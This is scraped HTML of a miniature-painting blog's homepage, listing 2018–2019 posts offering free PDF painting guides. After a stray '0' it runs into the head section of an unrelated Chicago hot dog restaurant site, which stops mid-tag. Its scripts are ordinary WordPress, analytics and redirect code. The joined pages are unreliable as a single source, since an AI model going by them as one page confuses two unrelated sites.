data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Initials Avatar April 2018" data-image-description="" data-medium-file="https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?fit=640%2C640&amp;ssl=1" /></a> <div class="site-tagline"> <h1 class="site-title"> <a href="https://sorastro.com/" rel="home">SORASTRO&#039;S PAINTING</a> </h1> <h2 class="site-description">CREATOR OF MINIATURE PAINTING TUTORIALS</h2> </div> </div> <div class="site-nav"><span class="site-nav-title">Menu</span><ul class="site-nav-menu" role="menu"><li class=""><a href="https://sorastro.com/about/" >About Sorastro</a></li><li class=""><a href="https://sorastro.com/sorastros-work/" >Sorastro&#039;s Work</a></li><li class=""><a href="https://sorastro.com/sorastros-music/" >Sorastro&#039;s Music</a></li><li class=""><a href="https://sorastro.com/pdf-painting-guide-index-for-patrons/" >PDF Index for Patrons</a></li><li class=""><a href="https://sorastro.com/painting-technique-index/" >Painting Technique Index</a></li></ul></div> <div class="site-filter"> <form role="search" method="get" class="search-form" action="https://sorastro.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search" value="" name="s"> </label> <input type="submit" class="search-submit" value="Search"> </form> </div> </div> </div> </header> <div class="site-content" id="content"> <div class="content-area" id="primary"> <main class="site-main" id="main" role="main"> <article class="entry post-2025 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized" id="post-2025"> <div class="entry-main"> <a class="entry-thumbnail-link" href="https://sorastro.com/2019/05/02/old-statues-pdf-painting-guide/"><div class="entry-thumbnail" style="background-image: url(https://i1.wp.com/sorastro.com/wp-content/uploads/2019/05/Statues-Complete-wider-shot.jpg?fit=750%2C422&#038;ssl=1);"></div></a> <div class="layout-span entry-layout"> <div class="layout-entry"> <header class="entry-header"> <div class="entry-meta"> <div class="entry-meta-item published-link"> <a href="https://sorastro.com/2019/05/02/old-statues-pdf-painting-guide/" rel="bookmark"> <time datetime="2019-05-02T10:38:31+00:00">May 2, 2019</time> </a> </div> <div class="entry-meta-item comments-link"> <a href="https://sorastro.com/2019/05/02/old-statues-pdf-painting-guide/#comments">6 Comments</a> </div> </div> <h1 class="entry-title"> <a href="https://sorastro.com/2019/05/02/old-statues-pdf-painting-guide/">Old Statues PDF Painting Guide</a> </h1> </header> <div class="entry-content layout-entry-content"> <p>Hello again! I have yet another PDF guide for you today which you can DOWNLOAD HERE, this time for a pair of statue miniatures.  These particular figures came with the the &#8220;Ruins of Osgiliath&#8221; scenery set by Games Workshop, but the colours and techniques used could of course have a wide range of applications. I actually bought the set many years ago but decided to paint the statues to use as scenic pieces when playing The Lord of the Rings:<a class="entry-more" href="https://sorastro.com/2019/05/02/old-statues-pdf-painting-guide/">Read more</a></p> </div> </div> </div> </div> </article> <article class="entry post-2022 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized" id="post-2022"> <div class="entry-main"> <a class="entry-thumbnail-link" href="https://sorastro.com/2019/05/01/death-troopers-pdf-guide/"><div class="entry-thumbnail" style="background-image: url(https://i1.wp.com/sorastro.com/wp-content/uploads/2019/05/Death-Troopers-FINAL-SHOOT-2.jpg?fit=750%2C422&#038;ssl=1);"></div></a> <div class="layout-span entry-layout"> <div class="layout-entry"> <header class="entry-header"> <div class="entry-meta"> <div class="entry-meta-item published-link"> <a href="https://sorastro.com/2019/05/01/death-troopers-pdf-guide/" rel="bookmark"> <time datetime="2019-05-01T16:05:45+00:00">May 1, 2019</time> </a> </div> </div> <h1 class="entry-title"> <a href="https://sorastro.com/2019/05/01/death-troopers-pdf-guide/">Death Troopers PDF Guide</a> </h1> </header> <div class="entry-content layout-entry-content"> <p>Hi Dear Viewers! Today I&#8217;d like to share with you another PDF painting guide &#8211; this time for the awesome Death Troopers from StarWars™ Legion™ which you can DOWNLOAD HERE. I actually painted half of the squad live at the recent Star Wars Celebration,  and the remaining figures whilst preparing this guide.  My aim was to get them painted pretty quickly (less than an hour per figure) but still achieve a striking look.  Things are therefor a little sketchy, but<a class="entry-more" href="https://sorastro.com/2019/05/01/death-troopers-pdf-guide/">Read more</a></p> </div> </div> </div> </div> </article> <article class="entry post-2004 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized" id="post-2004"> <div class="entry-main"> <a class="entry-thumbnail-link" href="https://sorastro.com/2019/04/25/gloomhaven-painting-guide-brute/"><div class="entry-thumbnail" style="background-image: url(https://i1.wp.com/sorastro.com/wp-content/uploads/2019/04/Brute-for-PDF-128.jpg?fit=750%2C375&#038;ssl=1);"></div></a> <div class="layout-span entry-layout"> <div class="layout-entry"> <header class="entry-header"> <div class="entry-meta"> <div class="entry-meta-item published-link"> <a href="https://sorastro.com/2019/04/25/gloomhaven-painting-guide-brute/" rel="bookmark"> <time datetime="2019-04-25T14:26:35+00:00">April 25, 2019</time> </a> </div> </div> <h1 class="entry-title"> <a href="https://sorastro.com/2019/04/25/gloomhaven-painting-guide-brute/">Gloomhaven Painting Guide: Brute</a> </h1> </header> <div class="entry-content layout-entry-content"> <p>Hello! A little over a year ago I began work on a series of PDF painting guides for the Gloomhaven board game for my patrons over on Patreon.  Although I&#8217;m still working my way through the &#8220;unlockable&#8221; classes, I&#8217;ve chosen to begin releasing the earlier guides here for the wider community to enjoy! To that end I&#8217;d like to share with you the first PDF guide which is for the Brute, and which you can download for free here. My<a class="entry-more" href="https://sorastro.com/2019/04/25/gloomhaven-painting-guide-brute/">Read more</a></p> </div> </div> </div> </div> </article> <article class="entry post-1968 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized" id="post-1968"> <div class="entry-main"> <a class="entry-thumbnail-link" href="https://sorastro.com/2019/03/09/coming-soon-spring-2019/"><div class="entry-thumbnail" style="background-image: url(https://i1.wp.com/sorastro.com/wp-content/uploads/2019/03/LoTRJiME-K0503-D9343_22315_JourneysinMiddleEarthCover_ChrisRahn.jpg?fit=750%2C750&#038;ssl=1);"></div></a> <div class="layout-span entry-layout"> <div class="layout-entry"> <header class="entry-header"> <div class="entry-meta"> <div class="entry-meta-item published-link"> <a href="https://sorastro.com/2019/03/09/coming-soon-spring-2019/" rel="bookmark"> <time datetime="2019-03-09T15:28:48+00:00">March 9, 2019</time> </a> </div> <div class="entry-meta-item comments-link"> <a href="https://sorastro.com/2019/03/09/coming-soon-spring-2019/#comments">5 Comments</a> </div> </div> <h1 class="entry-title"> <a href="https://sorastro.com/2019/03/09/coming-soon-spring-2019/">Coming Soon: Spring 2019</a> </h1> </header> <div class="entry-content layout-entry-content"> <p>Twitter, Facebook, Instagram, Spotify, iTunes, Patreon Hi Dear Viewers! It&#8217;s been a while since my last video so I thought I&#8217;d share a brief update to let you know what I&#8217;ve been up to, and what videos will be coming out over the coming months&#8230; Firstly I&#8217;d like to thank you for the kind reception of my last video &#8211; The Butcher from Kingdom Death: Monster: The Kingdom Death series is one in which I tend to cut loose a<a class="entry-more" href="https://sorastro.com/2019/03/09/coming-soon-spring-2019/">Read more</a></p> </div> </div> </div> </div> </article> <article class="entry post-1935 post type-post status-publish format-standard hentry category-uncategorized" id="post-1935"> <div class="entry-main"> <a class="entry-thumbnail-link" href="https://sorastro.com/2019/01/14/redgrass-games-360-miniature-painting-handle-review/"><div class="entry-thumbnail" style="background-image: url(https://i2.wp.com/sorastro.com/wp-content/uploads/2019/01/Mini-Holder.jpg?fit=750%2C422&#038;ssl=1);"></div></a> <div class="layout-span entry-layout"> <div class="layout-entry"> <header class="entry-header"> <div class="entry-meta"> <div class="entry-meta-item published-link"> <a href="https://sorastro.com/2019/01/14/redgrass-games-360-miniature-painting-handle-review/" rel="bookmark"> <time datetime="2019-01-14T18:22:32+00:00">January 14, 2019</time> </a> </div> </div> <h1 class="entry-title"> <a href="https://sorastro.com/2019/01/14/redgrass-games-360-miniature-painting-handle-review/">Redgrass Games 360 Miniature Painting Handle Review</a> </h1> </header> <div class="entry-content layout-entry-content"> <p>Hello! Some time ago I was kindly sent an early prototype of the new miniature holder by Redgrass Games to try out, and in this article I would like to give my brief and honest impressions of the product.  I&#8217;ll begin by restating that the holder I was sent was an early prototype and not necessarily indicative of the finished handle.  It&#8217;s also worth stating that this is not a paid review; my opinions are entirely unbiased and based on<a class="entry-more" href="https://sorastro.com/2019/01/14/redgrass-games-360-miniature-painting-handle-review/">Read more</a></p> </div> </div> </div> </div> </article> <article class="entry post-1922 post type-post status-publish format-standard hentry category-uncategorized" id="post-1922"> <div class="entry-main"> <a class="entry-thumbnail-link" href="https://sorastro.com/2019/01/10/priority-supplies-pdf-guide/"><div class="entry-thumbnail" style="background-image: url(https://i2.wp.com/sorastro.com/wp-content/uploads/2019/01/Priority-Supplies-COMPLETE.jpg?fit=750%2C422&#038;ssl=1);"></div></a> <div class="layout-span entry-layout"> <div class="layout-entry"> <header class="entry-header"> <div class="entry-meta"> <div class="entry-meta-item published-link"> <a href="https://sorastro.com/2019/01/10/priority-supplies-pdf-guide/" rel="bookmark"> <time datetime="2019-01-10T13:22:17+00:00">January 10, 2019</time> </a> </div> <div class="entry-meta-item comments-link"> <a href="https://sorastro.com/2019/01/10/priority-supplies-pdf-guide/#comments">3 Comments</a> </div> </div> <h1 class="entry-title"> <a href="https://sorastro.com/2019/01/10/priority-supplies-pdf-guide/">Priority Supplies PDF Guide</a> </h1> </header> <div class="entry-content layout-entry-content"> <p>Hello! I&#8217;d like to share with you my latest StarWars™ Legion™ PDF Painting Guide &#8211; the Priority Supplies!  I found these surprisingly fun to paint &#8211; especially the moisture vaporators. The next video in the series will cover both Chewbacca and the the Wookie Warriors. Happy painting! Sorastro.<a class="entry-more" href="https://sorastro.com/2019/01/10/priority-supplies-pdf-guide/">Read more</a></p> </div> </div> </div> </div> </article> <article class="entry post-1875 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized" id="post-1875"> <div class="entry-main"> <a class="entry-thumbnail-link" href="https://sorastro.com/2018/12/06/scout-troopers-pdf-guide/"><div class="entry-thumbnail" style="background-image: url(https://i1.wp.com/sorastro.com/wp-content/uploads/2018/11/Scout-Troopers-for-Web.jpg?fit=750%2C375&#038;ssl=1);"></div></a> <div class="layout-span entry-layout"> <div class="layout-entry"> <header class="entry-header"> <div class="entry-meta"> <div class="entry-meta-item published-link"> <a href="https://sorastro.com/2018/12/06/scout-troopers-pdf-guide/" rel="bookmark"> <time datetime="2018-12-06T17:16:02+00:00">December 6, 2018</time> </a> </div> <div class="entry-meta-item comments-link"> <a href="https://sorastro.com/2018/12/06/scout-troopers-pdf-guide/#comments">6 Comments</a> </div> </div> <h1 class="entry-title"> <a href="https://sorastro.com/2018/12/06/scout-troopers-pdf-guide/">Scout Troopers PDF Guide</a> </h1> </header> <div class="entry-content layout-entry-content"> <p>Hi Dear Viewers! Today I&#8217;d like to share a PDF guide for the awesome Scout Troopers from StarWars™ Legion™ which you can download for free here. As you can see I&#8217;ve chosen to capture the camouflaged look of the Scout Troopers we see briefly in Episode III. (If I was going to go with the more traditional black and white look I&#8217;d probably take the same approach I did in the Speeder Bike video tutorial.) Enjoy! Sorastro.<a class="entry-more" href="https://sorastro.com/2018/12/06/scout-troopers-pdf-guide/">Read more</a></p> </div> </div> </div> </div> </article> <article class="entry post-1823 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized" id="post-1823"> <div class="entry-main"> <a class="entry-thumbnail-link" href="https://sorastro.com/2018/08/16/snowtroopers-pdf-guide/"><div class="entry-thumbnail" style="background-image: url(https://i0.wp.com/sorastro.com/wp-content/uploads/2018/08/Snowtroopers-for-Web-16-by-9.jpg?fit=750%2C422&#038;ssl=1);"></div></a> <div class="layout-span entry-layout"> <div class="layout-entry"> <header class="entry-header"> <div class="entry-meta"> <div class="entry-meta-item published-link"> <a href="https://sorastro.com/2018/08/16/snowtroopers-pdf-guide/" rel="bookmark"> <time datetime="2018-08-16T15:49:39+00:00">August 16, 2018</time> </a> </div> <div class="entry-meta-item comments-link"> <a href="https://sorastro.com/2018/08/16/snowtroopers-pdf-guide/#comments">9 Comments</a> </div> </div> <h1 class="entry-title"> <a href="https://sorastro.com/2018/08/16/snowtroopers-pdf-guide/">Snowtroopers PDF Guide</a> </h1> </header> <div class="entry-content layout-entry-content"> <p>Hi Dear Viewers! As promised in the previous post I would like to share with you a PDF guide for painting the Snowtroopers from StarWars™ Legion™ which you can download for free HERE. As with the Fleet Troopers I&#8217;ve tried to achieve a good table-top standard in a reasonably economical way. I&#8217;ll be working on some more Legion videos quite soon.  In the mean time, I hope you enjoy the guide, and happy painting! Sorastro.<a class="entry-more" href="https://sorastro.com/2018/08/16/snowtroopers-pdf-guide/">Read more</a></p> </div> </div> </div> </div> </article> </main> <nav class="navigation infinite-navigation layout-span " role="navigation"> <h1 class="screen-reader-text">Posts navigation</h1> <div class="nav-links"> <a id="infinite-handle">Load more</a> </div> <div class="navigation-bar"></div> </nav> </div> <div class="widget-area widget-count-0" id="secondary" role="complementary"> <aside class="widget widget_search" id="search"> <form role="search" method="get" class="search-form" action="https://sorastro.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search" value="" name="s"> </label> <input type="submit" class="search-submit" value="Search"> </form> </aside> <aside class="widget"> <h1 class="widget-title">Archives</h1> <ul> <li><a href='https://sorastro.com/2019/05/'>May 2019</a></li> <li><a href='https://sorastro.com/2019/04/'>April 2019</a></li> <li><a href='https://sorastro.com/2019/03/'>March 2019</a></li> <li><a href='https://sorastro.com/2019/01/'>January 2019</a></li> <li><a href='https://sorastro.com/2018/12/'>December 2018</a></li> <li><a href='https://sorastro.com/2018/08/'>August 2018</a></li> <li><a href='https://sorastro.com/2018/04/'>April 2018</a></li> <li><a href='https://sorastro.com/2017/11/'>November 2017</a></li> <li><a href='https://sorastro.com/2017/10/'>October 2017</a></li> <li><a href='https://sorastro.com/2017/09/'>September 2017</a></li> <li><a href='https://sorastro.com/2017/08/'>August 2017</a></li> <li><a href='https://sorastro.com/2017/07/'>July 2017</a></li> <li><a href='https://sorastro.com/2017/05/'>May 2017</a></li> <li><a href='https://sorastro.com/2017/04/'>April 2017</a></li> <li><a href='https://sorastro.com/2017/03/'>March 2017</a></li> <li><a href='https://sorastro.com/2017/01/'>January 2017</a></li> <li><a href='https://sorastro.com/2016/12/'>December 2016</a></li> <li><a href='https://sorastro.com/2016/11/'>November 2016</a></li> <li><a href='https://sorastro.com/2016/09/'>September 2016</a></li> <li><a href='https://sorastro.com/2016/08/'>August 2016</a></li> <li><a href='https://sorastro.com/2016/06/'>June 2016</a></li> <li><a href='https://sorastro.com/2016/05/'>May 2016</a></li> <li><a href='https://sorastro.com/2016/04/'>April 2016</a></li> <li><a href='https://sorastro.com/2016/03/'>March 2016</a></li> </ul> </aside> <aside class="widget"> <h1 class="widget-title">Meta</h1> <ul> <li><a href="https://sorastro.com/wp-login.php">Log in</a></li> </ul> </aside> </div> </div><!-- #content --> <footer class="site-footer layout-span" id="colophon" role="contentinfo"> <div class="site-copyright">&copy; Copyright 2019.</div> <div class="site-credits"> <a href="https://wordpress.com/?ref=footer_custom_powered">Powered by WordPress.com</a>. </div> </footer> </div> <script type="text/javascript"> //<![CDATA[ var infiniteScroll = JSON.parse( decodeURIComponent( '%7B%22settings%22%3A%7B%22id%22%3A%22main%22%2C%22ajaxurl%22%3A%22https%3A%5C%2F%5C%2Fsorastro.com%5C%2F%3Finfinity%3Dscrolling%22%2C%22type%22%3A%22scroll%22%2C%22wrapper%22%3Afalse%2C%22wrapper_class%22%3A%22infinite-wrap%22%2C%22footer%22%3Afalse%2C%22click_handle%22%3A%221%22%2C%22text%22%3A%22Older%20posts%22%2C%22totop%22%3A%22Scroll%20back%20to%20top%22%2C%22currentday%22%3A%2216.08.18%22%2C%22order%22%3A%22DESC%22%2C%22scripts%22%3A%5B%5D%2C%22styles%22%3A%5B%5D%2C%22google_analytics%22%3Afalse%2C%22offset%22%3A1%2C%22history%22%3A%7B%22host%22%3A%22sorastro.com%22%2C%22path%22%3A%22%5C%2Fpage%5C%2F%25d%5C%2F%22%2C%22use_trailing_slashes%22%3Atrue%2C%22parameters%22%3A%22%22%7D%2C%22query_args%22%3A%7B%22error%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A0%2C%22post_parent%22%3A%22%22%2C%22subpost%22%3A%22%22%2C%22subpost_id%22%3A%22%22%2C%22attachment%22%3A%22%22%2C%22attachment_id%22%3A0%2C%22name%22%3A%22%22%2C%22static%22%3A%22%22%2C%22pagename%22%3A%22%22%2C%22page_id%22%3A0%2C%22second%22%3A%22%22%2C%22minute%22%3A%22%22%2C%22hour%22%3A%22%22%2C%22day%22%3A0%2C%22monthnum%22%3A0%2C%22year%22%3A0%2C%22w%22%3A0%2C%22category_name%22%3A%22%22%2C%22tag%22%3A%22%22%2C%22cat%22%3A%22%22%2C%22tag_id%22%3A%22%22%2C%22author%22%3A%22%22%2C%22author_name%22%3A%22%22%2C%22feed%22%3A%22%22%2C%22tb%22%3A%22%22%2C%22paged%22%3A0%2C%22meta_key%22%3A%22%22%2C%22meta_value%22%3A%22%22%2C%22preview%22%3A%22%22%2C%22s%22%3A%22%22%2C%22sentence%22%3A%22%22%2C%22title%22%3A%22%22%2C%22fields%22%3A%22%22%2C%22menu_order%22%3A%22%22%2C%22embed%22%3A%22%22%2C%22category__in%22%3A%5B%5D%2C%22category__not_in%22%3A%5B%5D%2C%22category__and%22%3A%5B%5D%2C%22post__in%22%3A%5B%5D%2C%22post__not_in%22%3A%5B%5D%2C%22post_name__in%22%3A%5B%5D%2C%22tag__in%22%3A%5B%5D%2C%22tag__not_in%22%3A%5B%5D%2C%22tag__and%22%3A%5B%5D%2C%22tag_slug__in%22%3A%5B%5D%2C%22tag_slug__and%22%3A%5B%5D%2C%22post_parent__in%22%3A%5B%5D%2C%22post_parent__not_in%22%3A%5B%5D%2C%22author__in%22%3A%5B%5D%2C%22author__not_in%22%3A%5B%5D%2C%22posts_per_page%22%3A8%2C%22ignore_sticky_posts%22%3Afalse%2C%22suppress_filters%22%3Afalse%2C%22cache_results%22%3Afalse%2C%22update_post_term_cache%22%3Atrue%2C%22lazy_load_term_meta%22%3Atrue%2C%22update_post_meta_cache%22%3Atrue%2C%22post_type%22%3A%22%22%2C%22nopaging%22%3Afalse%2C%22comments_per_page%22%3A%2250%22%2C%22no_found_rows%22%3Afalse%2C%22order%22%3A%22DESC%22%7D%2C%22query_before%22%3A%222019-05-16%2016%3A16%3A53%22%2C%22last_post_date%22%3A%222018-08-16%2015%3A49%3A39%22%2C%22body_class%22%3A%22infinite-scroll%20neverending%22%2C%22stats%22%3A%22blog%3D107888222%26host%3Dsorastro.com%26v%3Dext%26j%3D1%3A7.3.1%26x_pagetype%3Dinfinite-jetpack%22%7D%7D' ) ); //]]> </script> <!-- --> <!-- Your Google Analytics Plugin is missing the tracking ID --> <div style="display:none"> </div> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/infinite-scroll/infinity.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/photon/photon.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/sorastro.com\/wp-admin\/admin-ajax.php","nonce":"5441edc4ee","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/sorastro.com\/wp-login.php?redirect_to=https%3A%2F%2Fsorastro.com%2F2019%2F05%2F02%2Fold-statues-pdf-painting-guide%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/carousel/jetpack-carousel.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/wp-mediaelement.min.js'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/modules/wpgroho.js'></script> <script type='text/javascript' src='https://sorastro.com/wp-content/themes/bindery/js/vendor.js?ver=2014-12-15'></script> <script type='text/javascript' src='https://sorastro.com/wp-content/themes/bindery/js/theme.js?ver=2014-12-15'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/wp-embed.min.js'></script> <script type="text/javascript"> jQuery.extend( infiniteScroll.settings.scripts, ["jquery-core","jquery-migrate","jquery","spin","jquery.spin","tiled-gallery","mediaelement-core","mediaelement-migrate","mediaelement","the-neverending-homepage","jetpack-photon","devicepx","jetpack-carousel","wp-mediaelement","grofiles-cards","wpgroho","bindery-vendor","bindery-theme","wp-embed"] ); jQuery.extend( infiniteScroll.settings.styles, ["the-neverending-homepage","wp-block-library","jetpack_likes","jetpack-carousel","tiled-gallery","mediaelement","wp-mediaelement","bindery-style","bindery-webfonts","mp3-jplayer","jetpack_css"] ); </script><script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'107888222',post:'0',tz:'0',srv:'sorastro.com'} ]); _stq.push([ 'clickTrackerInit', '107888222', '0' ]); </script> </body> </html>
0
<!DOCTYPE html> <!--[if lt IE 7 ]> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="ie6"> <![endif]--> <!--[if IE 7 ]> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="ie7"> <![endif]--> <!--[if IE 8 ]> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="ie8"> <![endif]--> <!--[if IE 9 ]> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="ie9"> <![endif]--> <!--[if (gt IE 9)|!(IE)]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="chrome=1"> <meta name="google-site-verification" content="sDMjQr9znS20ENFSERKoTpeaggi6FSiQi02s-1_laxw" /> <title>Devil Dawgs - Amazing Chicago hot dogs, sinfully elevated.</title> <meta name="author" content=""> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="shortcut icon" href="https://devildawgs.com/wp-content/themes/devil-dawgs/images/favicon.ico"> <link rel="apple-touch-icon" href="https://devildawgs.com/wp-content/themes/devil-dawgs/images/apple-touch-icon.png"><!--60X60--> <link rel="stylesheet" type="text/css" href="//cloud.typography.com/6237672/720542/css/fonts.css" /> <link rel="profile" href="https://gmpg.org/xfn/11" /> <link rel="stylesheet" href="https://devildawgs.com/wp-content/themes/devil-dawgs/style.css?1491343003" type="text/css" media="screen, projection" /> <link rel="pingback" href="https://devildawgs.com/xmlrpc.php" /> <!-- This site is optimized with the Yoast SEO plugin v4.0 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Devil Dawgs delivers Chicago&#039;s best hot dogs and food with chef-inspired deliciousness. Give in to the sin and come by our two Chicago locations."/> <meta name="robots" content="noodp"/> <link rel="canonical" href="https://devildawgs.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Devil Dawgs - Amazing Chicago hot dogs, sinfully elevated." /> <meta property="og:description" content="Devil Dawgs delivers Chicago&#039;s best hot dogs and food with chef-inspired deliciousness. Give in to the sin and come by our two Chicago locations." /> <meta property="og:url" content="https://devildawgs.com/" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/devildawgs.com\/","name":"","potentialAction":{"@type":"SearchAction","target":"https:\/\/devildawgs.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title=" &raquo; Feed" href="https://devildawgs.com/feed/" /> <link rel="alternate" type="application/rss+xml" title=" &raquo; Comments Feed" href="https://devildawgs.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title=" &raquo; Home Comments Feed" href="https://devildawgs.com/home-3/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/devildawgs.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='nivoslider-css' href='https://devildawgs.com/wp-content/plugins/nivo-slider/scripts/nivo-slider/nivo-slider.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='jsb-rotate-css' href='https://devildawgs.com/wp-content/plugins/js-banner-rotate//includes/jsbrotate.css?ver=2.0.2' type='text/css' media='screen' /> <!-- This site uses the Google Analytics by MonsterInsights plugin v5.5.4 - Universal enabled - https://www.monsterinsights.com/ --> <script type="text/javascript"> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-47998736-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('send','pageview'); </script> <!-- / Google Analytics by MonsterInsights --> <script> if (document.location.protocol != "https:") { document.location = document.URL.replace(/^http:/i, "https:"); } </script> <script type='text/javascript' 